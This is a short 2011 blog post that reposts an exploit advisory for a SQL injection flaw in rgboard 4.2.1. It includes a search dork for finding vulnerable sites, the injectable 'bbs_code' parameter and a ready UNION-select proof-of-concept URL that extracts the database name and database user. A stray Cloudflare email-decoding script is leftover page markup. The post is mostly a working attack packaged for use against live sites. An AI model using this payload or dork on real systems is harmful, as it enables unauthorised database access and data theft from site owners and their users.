Post Your Wish

Wednesday, June 29, 2011

Rgboard SQL Injection Vulnerability

* Exploit Title: rgboard SQL Injection Vulnerability
 
* inurl: rgboard4/list.php
 
* Date: 2011. 6.22
 
* <script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</script>)
 
* Test on : Windowss XP SP3
 
* Software Link: http://v4.rgboard.com/rg4_board/down.php?&bbs_code=rgboard_pds&bd_num=1757&key=0&mode=down
 
* Version: rgboard 4.2.1
 
* SQL Injection
     
    http://[target]/list.php?bbs_code=notice[SQL]
 
* POC : http://site/list.php?bbs_code=notice'+and+1=2+union+select+1%2C2%2C3%
2C4%2C1%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17
%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C
database()%2C(select%20concat(0x2f,unhex(Hex(cast(user()%20as%20char)))))
%2C30%2C31%2C32%2C33%2C34%2C35%2C6%2C5%2C4%2C3%2C2%23

No comments:

Post a Comment